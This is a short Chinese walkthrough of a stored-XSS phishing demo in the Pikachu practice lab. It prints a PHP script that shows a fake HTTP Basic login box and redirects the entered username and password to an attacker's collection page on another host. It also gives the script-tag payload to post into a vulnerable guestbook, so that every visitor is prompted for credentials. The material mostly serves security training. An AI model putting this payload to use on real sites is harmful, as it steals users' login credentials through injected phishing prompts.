xss钓鱼演示

钓鱼攻击利用页面 D:\phpStudy\WWW\pikachu\pkxss\xfish
修改配置文件里面对应自己的入侵者的IP地址或者域名，对应的路径下的fish.php脚本如下：

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框，并给出迷惑性的info
    header('Content-type:text/html;charset=utf-8');
    header("WWW-Authenticate: Basic realm='认证'");
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authorization Required.';
    exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IP
//    header("Location: http://192.168.1.15/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
	header("Location: http://www.pikachu.net/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
    &password={$_SERVER[PHP_AUTH_PW]}");
}

?>

代码意思：就是将用户输入的账号信息发送到攻击者的平台上。

输入入侵者的IP地址
<script src="http://192.168.0.101/pikachu/pkxss/xfish/fish.php"></script>
基于我的环境如下
<script src='http://www.pikachu.net/pkxss/xfish/fish.php'></script>

在存在存储型xss漏洞的网页上，输入以上代码，永久性存储在网页前端，如果用户警惕不是很高，就会中招
将上面的script攻击代码输入到留言板里面进行提交，就会出现弹窗进行输入账号和密码，每次刷新都会弹窗

现在攻击者平台没有任何信息

当用户输入账号和密码，确定以后就会直接提交到攻击的平台上